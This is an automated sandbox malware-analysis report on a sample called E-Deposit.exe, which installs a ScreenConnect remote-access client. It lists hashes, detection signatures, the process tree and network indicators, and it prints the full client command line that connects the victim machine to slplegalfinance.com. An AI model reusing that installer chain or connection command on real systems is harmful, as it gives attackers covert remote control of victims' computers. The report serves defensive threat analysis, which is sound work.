
Windows Analysis Report
E-Deposit.exe

Overview

General Information

Sample name: E-Deposit.exe
Analysis ID: 1584729
MD5: 70d47fa2e078f04400d3d1b236245678
SHA1: 987aa3368265fc300b10b4128d8367c3d7a29c6c
SHA256: b0a8d541b650ffff1bb4b3690af389e52b1675212129560dbe33038b1041266b
Tags: ConnectWise, exe, user-CodeOmegaDelta

Detection

ScreenConnect Tool
Score: 66
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 32
Range: 0 - 100

Signatures

Multi AV Scanner detection for submitted file
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Detected potential unwanted application
Enables network access during safeboot for specific services
Modifies security policies related information
Possible COM Object hijacking
Reads the Security eventlog
Reads the System eventlog
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • E-Deposit.exe (PID: 7276 cmdline: "C:\Users\user\Desktop\E-Deposit.exe" MD5: 70D47FA2E078F04400D3D1B236245678)
    • msiexec.exe (PID: 7340 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 7372 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7420 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 7C96E0C746C692A03058DACF458A9432 C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 7468 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSICCC5.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5885281 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 7560 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 6DF4961B2A2833D6816518D4EE959F34 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 7612 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding BF7ECCB9F681B80AAF512F5A86264840 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • ScreenConnect.ClientService.exe (PID: 7648 cmdline: "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=slplegalfinance.com&p=443&s=01fec5eb-3274-44cf-8963-40ccf08671d2&k=BgIAAACkAABSU0ExAAgAAAEAAQDVyeZoBLn8WdM6xWDr4b0uAsUBfhP2EJOSdZugmbrUWVWehsUh2LvfCfwDYGcJBhcBEWS%2fDmahaCPw1tkv%2f%2bw18TIjThn%2bQ%2feZavwugcHDfdkaqKi0LnYdddcCsozuL7%2bVQevv9snFAHOiSjLD7xdNlPMSw%2bw682fIJIkr8XbdhPPukmg4Ksp6Kf1Xba7KkmNnwSS1MRXckDb%2f1hQrUI%2fSZZdGbJvZ3tc%2f3CR0LXLnGeCLG7Dt5iRIHwzJf5XuTInHiPesoO6bSk%2bUfoeCYO3BjvU6pRL6UKY08mjZ7e%2b6FOQb4acTm6QTR9K%2fsvFdvWQ%2br7EyKwXpSy6iTh4x7%2f%2bv" MD5: 75B21D04C69128A7230A0998086B61AA)
    • ScreenConnect.WindowsClient.exe (PID: 7728 cmdline: "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe" "RunRole" "c767b2ee-2b09-4628-9d93-0df3c46d63ac" "User" MD5: 1778204A8C3BC2B8E5E4194EDBAF7135)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
E-Deposit.exe | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

Source | Rule | Description | Author | Strings
C:\Windows\Temp\~DF97765AD7BBEEEF8A.TMP | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
C:\Windows\Temp\~DF85B4BC076AE408FE.TMP | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
C:\Windows\Temp\~DF86AC890801A3F764.TMP | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
C:\Windows\Installer\inprogressinstallinfo.ipi | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
C:\Config.Msi\59d35d.rbs | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.1699705428.0000000005C50000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000008.00000002.3520090259.0000000002A01000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000008.00000000.1729054331.00000000006F2000.00000002.00000001.01000000.00000011.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000000.00000002.1712436337.0000000007AA1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000000.00000000.1666529785.0000000000AE6000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

Source | Rule | Description | Author | Strings
0.2.E-Deposit.exe.5c50000.10.raw.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
8.0.ScreenConnect.WindowsClient.exe.6f0000.0.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
0.2.E-Deposit.exe.5c50000.10.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
8.2.ScreenConnect.WindowsClient.exe.2a7fa10.4.raw.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
0.0.E-Deposit.exe.b95db0.3.raw.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

System Summary

Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: ScreenConnect Client (484f9eed1d8e13b9) Credential Provider, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\msiexec.exe, ProcessId: 7372, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6FF59A85-BC37-4CD4-3A73-5AC4396425A8}\(Default)
No Suricata rule has matched

AV Detection

Source: E-Deposit.exe | ReversingLabs: Detection: 26%
Source: E-Deposit.exe | Virustotal: Detection: 31%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 89.4% probability
Source: C:\Users\user\Desktop\E-Deposit.exe | EXE: msiexec.exe

Compliance

Source: C:\Users\user\Desktop\E-Deposit.exe | EXE: msiexec.exe
Source: E-Deposit.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: E-Deposit.exe | Static PE information: certificate valid
Source: E-Deposit.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: E-Deposit.exe
Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: E-Deposit.exe
Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: E-Deposit.exe
Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr
Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr
Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000007.00000002.3539827027.0000000003117000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.3533129204.0000000012A10000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr
Source: Binary string: \??\C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Core.pdbl|r source: ScreenConnect.ClientService.exe, 00000007.00000002.3516481860.0000000001408000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: E-Deposit.exe, ScreenConnect.Core.dll.4.dr, ScreenConnect.Core.dll.2.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3520090259.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.3519460031.0000000002800000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.3519662167.0000000002952000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.dll.2.dr
Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: E-Deposit.exe
Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000007.00000000.1708388417.0000000000F5D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.2.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: E-Deposit.exe, ScreenConnect.Windows.dll.2.dr, ScreenConnect.Windows.dll.4.dr
Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000004.00000003.1692192902.0000000004100000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1683493567.000000000426F000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.4.dr
Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\net20\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.4.dr
Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: E-Deposit.exe, 59d35d.rbs.2.dr, MSID57F.tmp.2.dr, ScreenConnect.ClientSetup.msi.0.dr, MSID590.tmp.2.dr, 59d35c.msi.2.dr, MSID7B3.tmp.2.dr, 59d35e.msi.2.dr
Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000004.00000003.1683493567.0000000004200000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.4.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbS] source: E-Deposit.exe, ScreenConnect.Windows.dll.2.dr, ScreenConnect.Windows.dll.4.dr
Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000007.00000002.3539827027.0000000003117000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.3533129204.0000000012A10000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.2.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1729054331.00000000006F2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr
Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: E-Deposit.exe, MSICCC5.tmp.1.dr, ScreenConnect.ClientSetup.msi.0.dr, 59d35c.msi.2.dr, 59d35e.msi.2.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbu source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1729054331.00000000006F2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3519084709.00000000027C2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3519084709.00000000027C2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbf source: ScreenConnect.ClientService.exe, 00000007.00000002.3516481860.0000000001408000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000007.00000002.3539827027.0000000003117000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.3533129204.0000000012A10000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.2.dr
Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: E-Deposit.exe
Source: C:\Windows\System32\msiexec.exe | File opened: z:
Source: C:\Windows\System32\msiexec.exe | File opened: x:
Source: C:\Windows\System32\msiexec.exe | File opened: v:
Source: C:\Windows\System32\msiexec.exe | File opened: t:
Source: C:\Windows\System32\msiexec.exe | File opened: r:
Source: C:\Windows\System32\msiexec.exe | File opened: p:
Source: C:\Windows\System32\msiexec.exe | File opened: n:
Source: C:\Windows\System32\msiexec.exe | File opened: l:
Source: C:\Windows\System32\msiexec.exe | File opened: j:
Source: C:\Windows\System32\msiexec.exe | File opened: h:
Source: C:\Windows\System32\msiexec.exe | File opened: f:
Source: C:\Windows\System32\msiexec.exe | File opened: b:
Source: C:\Windows\System32\msiexec.exe | File opened: y:
Source: C:\Windows\System32\msiexec.exe | File opened: w:
Source: C:\Windows\System32\msiexec.exe | File opened: u:
Source: C:\Windows\System32\msiexec.exe | File opened: s:
Source: C:\Windows\System32\msiexec.exe | File opened: q:
Source: C:\Windows\System32\msiexec.exe | File opened: o:
Source: C:\Windows\System32\msiexec.exe | File opened: m:
Source: C:\Windows\System32\msiexec.exe | File opened: k:
Source: C:\Windows\System32\msiexec.exe | File opened: i:
Source: C:\Windows\System32\msiexec.exe | File opened: g:
Source: C:\Windows\System32\msiexec.exe | File opened: e:
Source: C:\Windows\System32\msiexec.exe | File opened: c:
Source: C:\Windows\System32\msiexec.exe | File opened: a:

Networking

Source: C:\Windows\System32\msiexec.exe | Registry value created: NULL Service
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: slplegalfinance.com
Source: E-Deposit.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3533129204.0000000012A10000.00000004.00000800.00020000.00000000.sdmp, E-Deposit.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: E-Deposit.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: E-Deposit.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: E-Deposit.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: E-Deposit.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: E-Deposit.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: ScreenConnect.WindowsCredentialProvider.dll.2.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3533129204.0000000012A10000.00000004.00000800.00020000.00000000.sdmp, E-Deposit.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: E-Deposit.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.dr | String found in binary or memory: http://ocsp.digicert.com0
Source: E-Deposit.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.dr | String found in binary or memory: http://ocsp.digicert.com0A
Source: E-Deposit.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.dr | String found in binary or memory: http://ocsp.digicert.com0C
Source: E-Deposit.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.dr | String found in binary or memory: http://ocsp.digicert.com0X
Source: ScreenConnect.ClientService.exe, 00000007.00000002.3521515935.000000000216D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: ScreenConnect.ClientService.exe, 00000007.00000002.3545982496.0000000004E70000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://slplegalfinance.com:443/
Source: ScreenConnect.ClientService.exe, 00000007.00000002.3521515935.00000000024CD000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.3521515935.000000000257D000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.3521515935.0000000002419000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.3521515935.000000000234E000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.3521515935.00000000021CF000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.3521515935.00000000022A4000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.3521515935.000000000261C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://slplegalfinance.com:443/d
Source: rundll32.exe, 00000004.00000003.1683864703.0000000004103000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1683493567.0000000004200000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1683493567.000000000426F000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.dr | String found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
Source: rundll32.exe, 00000004.00000003.1683864703.0000000004103000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1683493567.0000000004200000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1683493567.000000000426F000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.dr | String found in binary or memory: http://wixtoolset.org/news/
Source: rundll32.exe, 00000004.00000003.1683864703.0000000004103000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1683493567.0000000004200000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1683493567.000000000426F000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.dr | String found in binary or memory: http://wixtoolset.org/releases/
Source: E-Deposit.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.dr | String found in binary or memory: http://www.digicert.com/CPS0
Source: ScreenConnect.WindowsCredentialProvider.dll.2.dr | String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: ScreenConnect.Core.dll.2.dr | String found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown | Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown | Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown | Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49924
Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443

                                  Spam, unwanted Advertisements and Ransom Demands

Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
